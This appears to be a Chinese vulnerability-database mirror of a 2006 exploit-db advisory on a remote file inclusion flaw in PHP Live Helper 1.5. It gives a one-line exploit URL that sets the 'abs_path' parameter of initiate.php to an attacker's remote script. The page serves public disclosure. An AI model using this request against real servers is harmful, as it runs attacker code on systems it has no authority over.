PHP Live Helper 1.x - 'abs_path' Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055764 漏洞类型
发布时间 2006-06-18 更新时间 2006-06-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1926
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
---------------------------------------------------------------------------
PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHP Live Helper
version : 1.5 and last version
URL :http://www.live-helper.com/

------------------------------------------------------------------
Exploit:
~~~~~~~~

# http://www.site.com/[livehelperpath]/initiate.php?abs_path=[evil_scripts]

---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~

SnIpEr_SA
E-mail: selfar2002@hotmail.com
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/ & http://www.lezr.com/
Greetz: All My Frind
/*

-------------------------------- [ END ] ----------------------------------

# milw0rm.com [2006-06-18]